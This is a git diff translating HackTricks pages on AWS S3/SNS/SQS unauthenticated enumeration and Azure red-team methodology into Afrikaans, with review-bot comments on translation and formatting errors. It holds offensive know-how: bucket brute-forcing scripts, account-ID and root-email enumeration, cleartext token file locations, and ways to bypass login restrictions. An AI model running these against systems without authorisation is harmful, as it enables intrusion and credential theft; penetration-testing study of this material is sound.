--- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.md @@ -2,14 +2,8 @@ {{#include ../../../banners/hacktricks-training.md}} -### Public URL template - +### Publieke URL-sjabloon ``` {user_provided}...redshift.amazonaws.com ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md index 28c7b1673..928750488 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md 
@@ -1,43 +1,43 @@ -# AWS - S3 Unauthenticated Enum +# AWS - S3 Ongeauthentiseerde Enum {{#include ../../../banners/hacktricks-training.md}} -## S3 Public Buckets +## S3 Publieke Emmers -A bucket is considered **“public”** if **any user can list the contents** of the bucket, and **“private”** if the bucket's contents can **only be listed or written by certain users**. +'n Emmer word beskou as **“publiek”** as **enige gebruiker die inhoud** van die emmer kan lys, en **“privaat”** as die emmer se inhoud **slegs deur sekere gebruikers gelys of geskryf kan word**. -Companies might have **buckets permissions miss-configured** giving access either to everything or to everyone authenticated in AWS in any account (so to anyone). Note, that even with such misconfigurations some actions might not be able to be performed as buckets might have their own access control lists (ACLs). +Maatskappye mag **emmer toestemmings verkeerd geconfigureer** hĂȘ wat toegang gee tot alles of tot almal wat in AWS geverifieer is in enige rekening (dus vir enige iemand). Let daarop dat selfs met sulke misconfigurasies sommige aksies dalk nie uitgevoer kan word nie, aangesien emmers hul eie toegangbeheerlyste (ACLs) mag hĂȘ. -**Learn about AWS-S3 misconfiguration here:** [**http://flaws.cloud**](http://flaws.cloud/) **and** [**http://flaws2.cloud/**](http://flaws2.cloud) +**Leer meer oor AWS-S3 misconfigurasie hier:** [**http://flaws.cloud**](http://flaws.cloud/) **en** [**http://flaws2.cloud/**](http://flaws2.cloud) -### Finding AWS Buckets +### Vind AWS Emmers -Different methods to find when a webpage is using AWS to storage some resources: +Verskillende metodes om te vind wanneer 'n webblad AWS gebruik om sommige hulpbronne te stoor: -#### Enumeration & OSINT: +#### Enumerasie & OSINT: -- Using **wappalyzer** browser plugin -- Using burp (**spidering** the web) or by manually navigating through the page all **resources** **loaded** will be save in the History. 
-- **Check for resources** in domains like: +- Gebruik **wappalyzer** blaaiertoevoeging +- Gebruik burp (**spidering** die web) of deur handmatig deur die bladsy te navigeer, sal alle **hulpbronne** **gelaai** in die Geskiedenis gestoor word. +- **Kyk vir hulpbronne** in domeine soos: - ``` - http://s3.amazonaws.com/[bucket_name]/ - http://[bucket_name].s3.amazonaws.com/ - ``` +``` +http://s3.amazonaws.com/[bucket_name]/ +http://[bucket_name].s3.amazonaws.com/ +``` -- Check for **CNAMES** as `resources.domain.com` might have the CNAME `bucket.s3.amazonaws.com` -- Check [https://buckets.grayhatwarfare.com](https://buckets.grayhatwarfare.com/), a web with already **discovered open buckets**. -- The **bucket name** and the **bucket domain name** needs to be **the same.** - - **flaws.cloud** is in **IP** 52.92.181.107 and if you go there it redirects you to [https://aws.amazon.com/s3/](https://aws.amazon.com/s3/). Also, `dig -x 52.92.181.107` gives `s3-website-us-west-2.amazonaws.com`. - - To check it's a bucket you can also **visit** [https://flaws.cloud.s3.amazonaws.com/](https://flaws.cloud.s3.amazonaws.com/). +- Kyk vir **CNAMES** soos `resources.domain.com` mag die CNAME `bucket.s3.amazonaws.com` hĂȘ +- Kyk [https://buckets.grayhatwarfare.com](https://buckets.grayhatwarfare.com/), 'n web met reeds **ontdekke oop emmers**. +- Die **emmer naam** en die **emmer domeinnaam** moet **diezelfde wees.** +- **flaws.cloud** is in **IP** 52.92.181.107 en as jy daarheen gaan, lei dit jou na [https://aws.amazon.com/s3/](https://aws.amazon.com/s3/). Ook, `dig -x 52.92.181.107` gee `s3-website-us-west-2.amazonaws.com`. +- Om te kyk of dit 'n emmer is, kan jy ook **besoek** [https://flaws.cloud.s3.amazonaws.com/](https://flaws.cloud.s3.amazonaws.com/). 
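Review bot: the "Enumerasie & OSINT" list in the hunk above loses its nesting. The fenced URL block under "Kyk vir hulpbronne in domeine soos:" drops its two-space indent (the `-  ```` lines become `+````), which in CommonMark closes the list, so "Kyk vir CNAMES" and the items after it start a new list, and the two sub-items under "Die emmer naam en die emmer domeinnaam moet diezelfde wees" (the flaws.cloud IP note and the flaws.cloud.s3.amazonaws.com check) become top-level bullets instead of supporting points. Keep the indentation of the `-` lines. Spelling: "diezelfde" is Dutch, Afrikaans is "dieselfde" (used later in this same patch), and "geconfigureer" should be "gekonfigureer".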
#### Brute-Force -You can find buckets by **brute-forcing name**s related to the company you are pentesting: +Jy kan emmers vind deur **brute-forcing name** wat verband hou met die maatskappy wat jy pentest: - [https://github.com/sa7mon/S3Scanner](https://github.com/sa7mon/S3Scanner) - [https://github.com/clario-tech/s3-inspector](https://github.com/clario-tech/s3-inspector) -- [https://github.com/jordanpotti/AWSBucketDump](https://github.com/jordanpotti/AWSBucketDump) (Contains a list with potential bucket names) +- [https://github.com/jordanpotti/AWSBucketDump](https://github.com/jordanpotti/AWSBucketDump) (Bevat 'n lys met potensiĂ«le emmer name) - [https://github.com/fellchase/flumberboozle/tree/master/flumberbuckets](https://github.com/fellchase/flumberboozle/tree/master/flumberbuckets) - [https://github.com/smaranchand/bucky](https://github.com/smaranchand/bucky) - [https://github.com/tomdev/teh_s3_bucketeers](https://github.com/tomdev/teh_s3_bucketeers) @@ -45,48 +45,47 @@ You can find buckets by **brute-forcing name**s related to the company you are p - [https://github.com/Eilonh/s3crets_scanner](https://github.com/Eilonh/s3crets_scanner) - [https://github.com/belane/CloudHunter](https://github.com/belane/CloudHunter) -
# Generate a wordlist to create permutations
+
# Genereer 'n woordlys om permutasies te skep
 curl -s https://raw.githubusercontent.com/cujanovic/goaltdns/master/words.txt > /tmp/words-s3.txt.temp
 curl -s https://raw.githubusercontent.com/jordanpotti/AWSBucketDump/master/BucketNames.txt >>/tmp/words-s3.txt.temp
 cat /tmp/words-s3.txt.temp | sort -u > /tmp/words-s3.txt
 
-# Generate a wordlist based on the domains and subdomains to test
-## Write those domains and subdomains in subdomains.txt
+# Genereer 'n woordlys gebaseer op die domeine en subdomeine om te toets
+## Skryf daardie domeine en subdomeine in subdomains.txt
 cat subdomains.txt > /tmp/words-hosts-s3.txt
 cat subdomains.txt | tr "." "-" >> /tmp/words-hosts-s3.txt
 cat subdomains.txt | tr "." "\n" | sort -u >> /tmp/words-hosts-s3.txt
 
-# Create permutations based in a list with the domains and subdomains to attack
+# Skep permutasies gebaseer op 'n lys met die domeine en subdomeine om aan te val
 goaltdns -l /tmp/words-hosts-s3.txt -w /tmp/words-s3.txt -o /tmp/final-words-s3.txt.temp
-## The previous tool is specialized increating permutations for subdomains, lets filter that list
-### Remove lines ending with "."
+## Die vorige hulpmiddel is gespesialiseerd in die skep van permutasies vir subdomeine, kom ons filter daardie lys
+### Verwyder lyne wat eindig met "."
 cat /tmp/final-words-s3.txt.temp | grep -Ev "\.$" > /tmp/final-words-s3.txt.temp2
-### Create list without TLD
+### Skep lys sonder TLD
 cat /tmp/final-words-s3.txt.temp2 | sed -E 's/\.[a-zA-Z0-9]+$//' > /tmp/final-words-s3.txt.temp3
-### Create list without dots
+### Skep lys sonder punte
 cat /tmp/final-words-s3.txt.temp3 | tr -d "." > /tmp/final-words-s3.txt.temp4http://phantom.s3.amazonaws.com/
-### Create list without hyphens
+### Skep lys sonder koppelteken
 cat /tmp/final-words-s3.txt.temp3 | tr "." "-" > /tmp/final-words-s3.txt.temp5
 
-## Generate the final wordlist
+## Genereer die finale woordlys
 cat /tmp/final-words-s3.txt.temp2 /tmp/final-words-s3.txt.temp3 /tmp/final-words-s3.txt.temp4 /tmp/final-words-s3.txt.temp5 | grep -v -- "-\." | awk '{print tolower($0)}' | sort -u > /tmp/final-words-s3.txt
 
-## Call s3scanner
+## Roep s3scanner aan
 s3scanner --threads 100 scan --buckets-file /tmp/final-words-s3.txt  | grep bucket_exists
 
-#### Loot S3 Buckets +#### Loot S3 Emmers -Given S3 open buckets, [**BucketLoot**](https://github.com/redhuntlabs/BucketLoot) can automatically **search for interesting information**. +Gegewe S3 oop emmers, [**BucketLoot**](https://github.com/redhuntlabs/BucketLoot) kan outomaties **soek na interessante inligting**. -### Find the Region +### Vind die Streek -You can find all the supported regions by AWS in [**https://docs.aws.amazon.com/general/latest/gr/s3.html**](https://docs.aws.amazon.com/general/latest/gr/s3.html) +Jy kan al die ondersteunende streke deur AWS vind in [**https://docs.aws.amazon.com/general/latest/gr/s3.html**](https://docs.aws.amazon.com/general/latest/gr/s3.html) -#### By DNS - -You can get the region of a bucket with a **`dig`** and **`nslookup`** by doing a **DNS request of the discovered IP**: +#### Deur DNS +Jy kan die streek van 'n emmer kry met 'n **`dig`** en **`nslookup`** deur 'n **DNS versoek van die ontdekte IP** te doen: ```bash dig flaws.cloud ;; ANSWER SECTION: 
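Review bot: the comment `+### Skep lys sonder koppelteken` above `tr "." "-"` says the opposite of what the command does: it replaces dots with hyphens, producing a list with hyphens. The English original had the same mistake; since the line is being rewritten, make it "### Skep lys met koppeltekens in plaas van punte". Two lines higher, the unchanged context line `cat /tmp/final-words-s3.txt.temp3 | tr -d "." > /tmp/final-words-s3.txt.temp4http://phantom.s3.amazonaws.com/` has a URL fragment glued to the redirect target, so the temp4 list is never produced and the final `cat` reports a missing file; it is pre-existing, but it sits directly under a comment this patch rewrites, so trim the target to `/tmp/final-words-s3.txt.temp4` in the same change.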
@@ -96,31 +95,29 @@ nslookup 52.218.192.11 Non-authoritative answer: 11.192.218.52.in-addr.arpa name = s3-website-us-west-2.amazonaws.com. ``` +Kontroleer dat die opgeloste domein die woord "website" bevat.\ +Jy kan die statiese webwerf bereik deur te gaan na: `flaws.cloud.s3-website-us-west-2.amazonaws.com`\ +of jy kan die emmer bereik deur te besoek: `flaws.cloud.s3-us-west-2.amazonaws.com` -Check that the resolved domain have the word "website".\ -You can access the static website going to: `flaws.cloud.s3-website-us-west-2.amazonaws.com`\ -or you can access the bucket visiting: `flaws.cloud.s3-us-west-2.amazonaws.com` +#### Deur te Probeer -#### By Trying - -If you try to access a bucket, but in the **domain name you specify another region** (for example the bucket is in `bucket.s3.amazonaws.com` but you try to access `bucket.s3-website-us-west-2.amazonaws.com`, then you will be **indicated to the correct location**: +As jy probeer om toegang tot 'n emmer te verkry, maar in die **domeinnaam spesifiseer jy 'n ander streek** (byvoorbeeld die emmer is in `bucket.s3.amazonaws.com` maar jy probeer toegang verkry tot `bucket.s3-website-us-west-2.amazonaws.com`, dan sal jy **na die korrekte ligging gewys word**: ![](<../../../images/image (106).png>) -### Enumerating the bucket +### Om die emmer te enumereer -To test the openness of the bucket a user can just enter the URL in their web browser. A private bucket will respond with "Access Denied". A public bucket will list the first 1,000 objects that have been stored. +Om die oopheid van die emmer te toets, kan 'n gebruiker net die URL in hul webblaaier invoer. 'n Privaat emmer sal met "Toegang geweier" antwoordgee. 'n Publieke emmer sal die eerste 1,000 voorwerpe wat gestoor is, lys. 
-Open to everyone: +Oop vir almal: ![](<../../../images/image (201).png>) -Private: +Privaat: ![](<../../../images/image (83).png>) -You can also check this with the cli: - +Jy kan dit ook met die cli kontroleer: ```bash #Use --no-sign-request for check Everyones permissions #Use --profile to indicate the AWS profile(keys) that youwant to use: Check for "Any Authenticated AWS User" permissions 
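Review bot: in "Om die emmer te enumereer", `'n Privaat emmer sal met "Toegang geweier" antwoordgee` translates a quoted program response. The page quotes S3's literal reply, "Access Denied", and a reader comparing against the browser output will not find "Toegang geweier"; keep quoted output verbatim, as this hunk already does for the `dig` and `nslookup` output. Also "antwoordgee" should be two words, "antwoord gee".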
@@ -128,22 +125,18 @@ You can also check this with the cli: #Opcionally you can select the region if you now it aws s3 ls s3://flaws.cloud/ [--no-sign-request] [--profile ] [ --recursive] [--region us-west-2] ``` +As die emmer nie 'n domeinnaam het nie, wanneer jy probeer om dit te enumereer, **sit net die emmernaam** en nie die hele AWSs3-domein nie. Voorbeeld: `s3://` -If the bucket doesn't have a domain name, when trying to enumerate it, **only put the bucket name** and not the whole AWSs3 domain. Example: `s3://` - -### Public URL template - +### Publieke URL-sjabloon ``` https://{user_provided}.s3.amazonaws.com ``` +### Kry rekening ID van openbare emmer -### Get Account ID from public Bucket - -It's possible to determine an AWS account by taking advantage of the new **`S3:ResourceAccount`** **Policy Condition Key**. This condition **restricts access based on the S3 bucket** an account is in (other account-based policies restrict based on the account the requesting principal is in).\ -And because the policy can contain **wildcards** it's possible to find the account number **just one number at a time**. - -This tool automates the process: +Dit is moontlik om 'n AWS-rekening te bepaal deur voordeel te trek uit die nuwe **`S3:ResourceAccount`** **Beleidstoestand Sleutel**. Hierdie toestand **beperk toegang gebaseer op die S3-emmer** waarin 'n rekening is (ander rekening-gebaseerde beleide beperk gebaseer op die rekening waarin die versoekende prinsiep is).\ +En omdat die beleid **wildcards** kan bevat, is dit moontlik om die rekeningnommer **net een nommer op 'n slag** te vind. +Hierdie hulpmiddel outomatiseer die proses: ```bash # Installation pipx install s3-account-search 
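Review bot: "Beleidstoestand Sleutel" renders "Policy Condition Key" with "toestand" (state); the IAM sense of "condition" is "voorwaarde", which the Azure README in this patch already uses ("Bypass Inlog Voorwaardes"), so "Beleidsvoorwaarde-sleutel" fits. In the same paragraph "prinsiep" is not a word; keep "principal" as the IAM term, as the Azure README does with "Service Principal". The heading "Kry rekening ID van openbare emmer" uses "openbare" where every other heading in the patch says "Publieke"; align it.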
@@ -153,13 +146,11 @@ s3-account-search arn:aws:iam::123456789012:role/s3_read s3://my-bucket # With an object s3-account-search arn:aws:iam::123456789012:role/s3_read s3://my-bucket/path/to/object.ext ``` +Hierdie tegniek werk ook met API Gateway-URL's, Lambda-URL's, Data Exchange-data stelle en selfs om die waarde van etikette te verkry (as jy die etiket sleutel ken). Jy kan meer inligting vind in die [**oorspronklike navorsing**](https://blog.plerion.com/conditional-love-for-aws-metadata-enumeration/) en die hulpmiddel [**conditional-love**](https://github.com/plerionhq/conditional-love/) om hierdie uitbuiting te outomatiseer. -This technique also works with API Gateway URLs, Lambda URLs, Data Exchange data sets and even to get the value of tags (if you know the tag key). You can find more information in the [**original research**](https://blog.plerion.com/conditional-love-for-aws-metadata-enumeration/) and the tool [**conditional-love**](https://github.com/plerionhq/conditional-love/) to automate this exploitation. - -### Confirming a bucket belongs to an AWS account - -As explained in [**this blog post**](https://blog.plerion.com/things-you-wish-you-didnt-need-to-know-about-s3/)**, if you have permissions to list a bucket** it’s possible to confirm an accountID the bucket belongs to by sending a request like: +### Bevestiging dat 'n emmer aan 'n AWS-rekening behoort +Soos verduidelik in [**hierdie blogpos**](https://blog.plerion.com/things-you-wish-you-didnt-need-to-know-about-s3/)**, as jy toestemmings het om 'n emmer te lys** is dit moontlik om 'n accountID te bevestig waaraan die emmer behoort deur 'n versoek soos die volgende te stuur: ```bash curl -X GET "[bucketname].amazonaws.com/" \ -H "x-amz-expected-bucket-owner: [correct-account-id]" 
@@ -167,41 +158,34 @@ curl -X GET "[bucketname].amazonaws.com/" \ ... ``` - If the error is an “Access Denied” it means that the account ID was wrong. ### Used Emails as root account enumeration -As explained in [**this blog post**](https://blog.plerion.com/things-you-wish-you-didnt-need-to-know-about-s3/), it's possible to check if an email address is related to any AWS account by **trying to grant an email permissions** over a S3 bucket via ACLs. If this doesn't trigger an error, it means that the email is a root user of some AWS account: - +Soos verduidelik in [**hierdie blogpos**](https://blog.plerion.com/things-you-wish-you-didnt-need-to-know-about-s3/), is dit moontlik om te kyk of 'n e-posadres verband hou met enige AWS-rekening deur **te probeer om 'n e-pos toestemming te gee** oor 'n S3-bucket via ACLs. As dit nie 'n fout veroorsaak nie, beteken dit dat die e-pos 'n root-gebruiker van 'n AWS-rekening is: ```python s3_client.put_bucket_acl( - Bucket=bucket_name, - AccessControlPolicy={ - 'Grants': [ - { - 'Grantee': { - 'EmailAddress': 'some@emailtotest.com', - 'Type': 'AmazonCustomerByEmail', - }, - 'Permission': 'READ' - }, - ], - 'Owner': { - 'DisplayName': 'Whatever', - 'ID': 'c3d78ab5093a9ab8a5184de715d409c2ab5a0e2da66f08c2f6cc5c0bdeadbeef' - } - } +Bucket=bucket_name, +AccessControlPolicy={ +'Grants': [ +{ +'Grantee': { +'EmailAddress': 'some@emailtotest.com', +'Type': 'AmazonCustomerByEmail', +}, +'Permission': 'READ' +}, +], +'Owner': { +'DisplayName': 'Whatever', +'ID': 'c3d78ab5093a9ab8a5184de715d409c2ab5a0e2da66f08c2f6cc5c0bdeadbeef' +} +} ) ``` - -## References +## Verwysings - [https://www.youtube.com/watch?v=8ZXRw4Ry3mQ](https://www.youtube.com/watch?v=8ZXRw4Ry3mQ) - [https://cloudar.be/awsblog/finding-the-account-id-of-any-public-s3-bucket/](https://cloudar.be/awsblog/finding-the-account-id-of-any-public-s3-bucket/) {{#include ../../../banners/hacktricks-training.md}} - - - - 
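Review bot: the `put_bucket_acl` block in this hunk has all its indentation stripped (`+Bucket=bucket_name,`, `+AccessControlPolicy={`, `+'Grants': [`). Python accepts it because the lines sit inside the call's parentheses, but the nested dict is now unreadable, and nothing in the block needed translating; keep the original `-` lines unchanged. Two smaller points in the same hunk: the context heading `### Used Emails as root account enumeration` is the only heading on the page left in English, and the new paragraph says "S3-bucket" while the rest of the page says "emmer"; use one term for bucket throughout (keeping "bucket" untranslated would match how the patch treats "Kafka broker" and "Service Principal").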
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md index 7978eff36..fc9ef53c7 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md @@ -4,22 +4,18 @@ ## SNS -For more information about SNS check: +Vir meer inligting oor SNS, kyk: {{#ref}} ../aws-services/aws-sns-enum.md {{#endref}} -### Open to All +### Oop vir Alle -When you configure a SNS topic from the web console it's possible to indicate that **Everyone can publish and subscribe** to the topic: +Wanneer jy 'n SNS-tema vanaf die webkonsol konfigureer, is dit moontlik om aan te dui dat **Enigeen kan publiseer en inteken** op die tema:
-So if you **find the ARN of topics** inside the account (or brute forcing potential names for topics) you can **check** if you can **publish** or **subscribe** to **them**. +So as jy **die ARN van temas** binne die rekening **vind** (of potensiĂ«le name vir temas brute force), kan jy **kontroleer** of jy kan **publiseer** of **inteken** op **hulle**. {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md index a5006a63b..2c7a3d634 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md @@ -4,24 +4,18 @@ ## SQS -For more information about SQS check: +Vir meer inligting oor SQS, kyk: {{#ref}} ../aws-services/aws-sqs-and-sns-enum.md {{#endref}} -### Public URL template - +### Publieke URL-sjabloon ``` https://sqs.[region].amazonaws.com/[account-id]/{user_provided} ``` +### Kontroleer Toestemmings -### Check Permissions - -It's possible to misconfigure a SQS queue policy and grant permissions to everyone in AWS to send and receive messages, so if you get the ARN of queues try if you can access them. +Dit is moontlik om 'n SQS-rybeleid verkeerd te konfigureer en toestemmings aan almal in AWS te gee om boodskappe te stuur en te ontvang, so as jy die ARN van rye kry, probeer of jy toegang daartoe kan kry. {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/README.md b/src/pentesting-cloud/azure-security/README.md index 9d2de65fc..01cc8a3fa 100644 --- a/src/pentesting-cloud/azure-security/README.md +++ b/src/pentesting-cloud/azure-security/README.md 
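Review bot: in the SNS hunk, `+### Oop vir Alle` should be "Oop vir Almal", matching `+Oop vir almal:` in the S3 page of this patch. "SNS-tema" translates the AWS term topic as "tema" (theme); likewise "SQS-rybeleid" in the SQS hunk uses "ry" (row) for queue, where Afrikaans has "tou". Since the patch keeps "ARN", "Kafka broker" and "S3-bucket" untranslated, keeping "topic" and "queue" as the service nouns would be the most consistent choice.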
@@ -2,86 +2,85 @@ {{#include ../../banners/hacktricks-training.md}} -## Basic Information +## Basiese Inligting {{#ref}} az-basic-information/ {{#endref}} -## Azure Pentester/Red Team Methodology +## Azure Pentester/Red Team Metodologie -In order to audit an AZURE environment it's very important to know: which **services are being used**, what is **being exposed**, who has **access** to what, and how are internal Azure services and **external services** connected. +Om 'n AZURE omgewing te oudit, is dit baie belangrik om te weet: watter **dienste gebruik word**, wat is **blootgestel**, wie het **toegang** tot wat, en hoe is interne Azure dienste en **eksterne dienste** gekoppel. -From a Red Team point of view, the **first step to compromise an Azure environment** is to manage to obtain some **credentials** for Azure AD. Here you have some ideas on how to do that: +Vanuit 'n Red Team perspektief, is die **eerste stap om 'n Azure omgewing te kompromitteer** om daarin te slaag om 'n paar **bewyse** vir Azure AD te verkry. Hier is 'n paar idees oor hoe om dit te doen: -- **Leaks** in github (or similar) - OSINT -- **Social** Engineering -- **Password** reuse (password leaks) -- Vulnerabilities in Azure-Hosted Applications - - [**Server Side Request Forgery**](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf) with access to metadata endpoint - - **Local File Read** - - `/home/USERNAME/.azure` - - `C:\Users\USERNAME\.azure` - - The file **`accessTokens.json`** in `az cli` before 2.30 - Jan2022 - stored **access tokens in clear text** - - The file **`azureProfile.json`** contains **info** about logged user. - - **`az logout`** removes the token. - - Older versions of **`Az PowerShell`** stored **access tokens** in **clear** text in **`TokenCache.dat`**. It also stores **ServicePrincipalSecret** in **clear**-text in **`AzureRmContext.json`**. 
The cmdlet **`Save-AzContext`** can be used to **store** **tokens**.\ - Use `Disconnect-AzAccount` to remove them. -- 3rd parties **breached** -- **Internal** Employee -- [**Common Phishing**](https://book.hacktricks.xyz/generic-methodologies-and-resources/phishing-methodology) (credentials or Oauth App) - - [Device Code Authentication Phishing](az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md) -- [Azure **Password Spraying**](az-unauthenticated-enum-and-initial-entry/az-password-spraying.md) +- **Lekke** in github (of soortgelyk) - OSINT +- **Sosiale** Ingenieurswese +- **Wagwoord** hergebruik (wagwoordlekke) +- Kwesbaarhede in Azure-gehoste toepassings +- [**Server Side Request Forgery**](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf) met toegang tot metadata-eindpunt +- **Plaaslike LĂȘer Lees** +- `/home/USERNAME/.azure` +- `C:\Users\USERNAME\.azure` +- Die lĂȘer **`accessTokens.json`** in `az cli` voor 2.30 - Jan2022 - gestoor **toegangstokens in duidelike teks** +- Die lĂȘer **`azureProfile.json`** bevat **inligting** oor die ingelogde gebruiker. +- **`az logout`** verwyder die token. +- Ou weergawe van **`Az PowerShell`** het **toegangstokens** in **duidelike** teks in **`TokenCache.dat`** gestoor. Dit stoor ook **ServicePrincipalSecret** in **duidelike** teks in **`AzureRmContext.json`**. Die cmdlet **`Save-AzContext`** kan gebruik word om **tokens** te **stoor**.\ +Gebruik `Disconnect-AzAccount` om hulle te verwyder. 
+- 3de partye **gekompromitteer** +- **Interne** Werknemer +- [**Algemene Phishing**](https://book.hacktricks.xyz/generic-methodologies-and-resources/phishing-methodology) (bewyse of Oauth App) +- [Toestelkode Verifikasie Phishing](az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md) +- [Azure **Wagwoord Spuit**](az-unauthenticated-enum-and-initial-entry/az-password-spraying.md) -Even if you **haven't compromised any user** inside the Azure tenant you are attacking, you can **gather some information** from it: +Selfs as jy **nie enige gebruiker** binne die Azure tenant wat jy aanval, gecompromitteer het nie, kan jy **'n paar inligting** daaruit versamel: {{#ref}} az-unauthenticated-enum-and-initial-entry/ {{#endref}} > [!NOTE] -> After you have managed to obtain credentials, you need to know **to who do those creds belong**, and **what they have access to**, so you need to perform some basic enumeration: +> Nadat jy daarin geslaag het om bewese te verkry, moet jy weet **aan wie behoort daardie bewese**, en **waartoe hulle toegang het**, so jy moet 'n paar basiese enumerasie uitvoer: -## Basic Enumeration +## Basiese Enumerasie > [!NOTE] -> Remember that the **noisiest** part of the enumeration is the **login**, not the enumeration itself. +> Onthou dat die **luidste** deel van die enumerasie die **inlog** is, nie die enumerasie self nie. ### SSRF -If you found a SSRF in a machine inside Azure check this page for tricks: +As jy 'n SSRF in 'n masjien binne Azure gevind het, kyk hierdie bladsy vir truuks: {{#ref}} https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf {{#endref}} -### Bypass Login Conditions +### Bypass Inlog Voorwaardes
-In cases where you have some valid credentials but you cannot login, these are some common protections that could be in place: +In gevalle waar jy 'n paar geldige bewese het maar jy kan nie inlog nie, is dit 'n paar algemene beskermings wat in plek kan wees: -- **IP whitelisting** -- You need to compromise a valid IP -- **Geo restrictions** -- Find where the user lives or where are the offices of the company and get a IP from the same city (or contry at least) -- **Browser** -- Maybe only a browser from certain OS (Windows, Linux, Mac, Android, iOS) is allowed. Find out which OS the victim/company uses. -- You can also try to **compromise Service Principal credentials** as they usually are less limited and its login is less reviewed +- **IP witlys** -- Jy moet 'n geldige IP kompromitteer +- **Geo beperkings** -- Vind waar die gebruiker woon of waar die kantore van die maatskappy is en kry 'n IP van dieselfde stad (of land ten minste) +- **Blaaier** -- Miskien is slegs 'n blaaier van sekere OS (Windows, Linux, Mac, Android, iOS) toegelaat. Vind uit watter OS die slagoffer/maatskappy gebruik. +- Jy kan ook probeer om **Service Principal bewese** te kompromitteer aangesien hulle gewoonlik minder beperk is en hul inlog minder nagegaan word. -After bypassing it, you might be able to get back to your initial setup and you will still have access. +Nadat jy dit omseil het, mag jy in staat wees om terug te keer na jou aanvanklike opstelling en jy sal steeds toegang hĂȘ. -### Subdomain Takeover +### Subdomein Oorname - [https://godiego.co/posts/STO-Azure/](https://godiego.co/posts/STO-Azure/) ### Whoami > [!CAUTION] -> Learn **how to install** az cli, AzureAD and Az PowerShell in the [**Az - Entra ID**](az-services/az-azuread.md) section. +> Leer **hoe om** az cli, AzureAD en Az PowerShell in die [**Az - Entra ID**](az-services/az-azuread.md) afdeling te installeer. 
-One of the first things you need to know is **who you are** (in which environment you are): +Een van die eerste dinge wat jy moet weet is **wie jy is** (in watter omgewing jy is): {{#tabs }} {{#tab name="az cli" }} - ```bash az account list az account tenant list # Current tenant info @@ -90,22 +89,18 @@ az ad signed-in-user show # Current signed-in user az ad signed-in-user list-owned-objects # Get owned objects by current user az account management-group list #Not allowed by default ``` - {{#endtab }} {{#tab name="AzureAD" }} - ```powershell #Get the current session state Get-AzureADCurrentSessionInfo #Get details of the current tenant Get-AzureADTenantDetail ``` - {{#endtab }} {{#tab name="Az PowerShell" }} - ```powershell # Get the information about the current context (Account, Tenant, Subscription etc.) Get-AzContext 
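Review bot: the credentials list in the first Azure README hunk is flattened: the `-` lines nest `/home/USERNAME/.azure`, `C:\Users\USERNAME\.azure`, `accessTokens.json`, `azureProfile.json` and the Az PowerShell token files under "Local File Read", itself a sub-item of "Vulnerabilities in Azure-Hosted Applications", and "Device Code Authentication Phishing" under "Common Phishing"; the `+` lines make all of them top-level bullets, so the paths now read as independent initial-access routes rather than as what a local file read would expose. Restore the two- and four-space indents. Spelling in the same hunk: "bewese" (used throughout) should be "bewyse", the form used a few lines above; "gecompromitteer" should be "gekompromitteer" as in "3de partye **gekompromitteer**"; "Ou weergawe van Az PowerShell" translates "Older versions", so "Ouer weergawes van".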
@@ -121,53 +116,49 @@ Get-AzResource Get-AzRoleAssignment # For all users Get-AzRoleAssignment -SignInName test@corp.onmicrosoft.com # For current user ``` - {{#endtab }} {{#endtabs }} > [!CAUTION] -> Oone of the most important commands to enumerate Azure is **`Get-AzResource`** from Az PowerShell as it lets you **know the resources your current user has visibility over**. +> Een van die belangrikste opdragte om Azure te enumerate is **`Get-AzResource`** van Az PowerShell, aangesien dit jou **inligting gee oor die hulpbronne wat jou huidige gebruiker kan sien**. > -> You can get the same info in the **web console** going to [https://portal.azure.com/#view/HubsExtension/BrowseAll](https://portal.azure.com/#view/HubsExtension/BrowseAll) or searching for "All resources" +> Jy kan dieselfde inligting in die **webkonsol** kry deur na [https://portal.azure.com/#view/HubsExtension/BrowseAll](https://portal.azure.com/#view/HubsExtension/BrowseAll) te gaan of te soek na "Alle hulpbronne" ### ENtra ID Enumeration -By default, any user should have **enough permissions to enumerate** things such us, users, groups, roles, service principals... (check [default AzureAD permissions](az-basic-information/#default-user-permissions)).\ -You can find here a guide: +Standaard behoort enige gebruiker **voldoende regte te hĂȘ om** dinge soos gebruikers, groepe, rolle, diensprincipals... te enumerate (kyk [standaard AzureAD regte](az-basic-information/#default-user-permissions)).\ +Jy kan hier 'n gids vind: {{#ref}} az-services/az-azuread.md {{#endref}} > [!NOTE] -> Now that you **have some information about your credentials** (and if you are a red team hopefully you **haven't been detected**). It's time to figure out which services are being used in the environment.\ -> In the following section you can check some ways to **enumerate some common services.** +> Nou dat jy **'n bietjie inligting oor jou akrediteerings het** (en as jy 'n rooi span is, hoop ek jy **is nie opgespoor nie**). 
